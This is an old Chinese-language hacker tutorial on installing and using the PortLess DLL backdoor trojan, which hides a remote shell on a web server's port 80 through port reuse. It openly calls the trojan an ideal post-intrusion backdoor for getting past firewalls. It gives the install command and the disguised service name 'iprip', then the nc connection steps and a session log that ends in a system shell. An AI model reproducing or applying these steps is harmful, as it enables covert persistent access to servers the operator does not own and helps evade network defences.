DLL后门PortLess的安装手册

DLL后门PortLess的安装手册

Help document write by heiyeluren
04/02/01

(今年年初写的文章,拿出来,自己研究后乱写的,那时候还没看该后门的帮助文档,没技术含量,只是纪念一下,呵呵)

PortLess木马是DLL类的木马,采用端口复用技术,可以绕过很多防火墙,是入侵WEB服务器做为后门的绝佳工具.
什么是端口复用技术,就是通过一些已经在使用的端口来绑定我们的shell,一般这样的话,那些端口都是防火墙允许的端口,不会被查杀.

Portlessinst的安装格式:
Portlessinst.exe -install <特征字符串> <连接密码>

该后门安装为服务叫iprip,那么一般安装后使用:
net start iprip
来启动.

使用nc类工具来连接:
nc -vv 对方IP地址 80端口 //因为只有80端口是允许使用的,因为有防火墙
然后输入特征字符串和端口,命令为：<特征字符号串>:80 //就是把shell绑定在该服务器的80端口,不会被拦截
使用nc来连接:
nc -vv IP地址 80端口

我们来举例介绍:
1.安装
C:/>portlessinst
PortLess V1.1 Installer By WinEggDrop

Usage: portlessinst -Install ActiveString Password
Usage: portlessinst -Set ActiveString Password
Usage: portlessinst -Uninstall

C:/>Portlessinst.exe -install xhl heiyeluren //我们使用xhl为特征字符串,使用heiyeluren为连接密码

C:/>net start iprip //启动我们安装之后的服务

2.连接
C:/>nc -vv 192.168.0.2 80

DNS fwd/rev mismatch: localhost != hysw
localhost [192.168.0.2] 80 (http) open
xhl:80 //输入特征字符串和要绑定shell的端口为80

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.1
Date: Sun, 01 Feb 2004 02:35:23 GMT
Content-Type: text/html
Content-Length: 87

<html><head><title>Error</title></head><body>The parameter is incorrect. </body>
</html>sent 8, rcvd 224: NOTSOCK

C:/>nc -vv 192.168.0.2 80
Waring: inverse host lookup failed for 192.168.0.2: h_error 11804: NO_DATA
localhost [192.168.0.2] 80 (http) open
Enter Password: heiyeluren //提示输入密码,我们输入heiyeluren
   Welcome To Portless BackDoor
<Syrinx>#shell
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:/windows/system32> //已经获得了Shell

 

Help document write by heiyeluren
04/02/01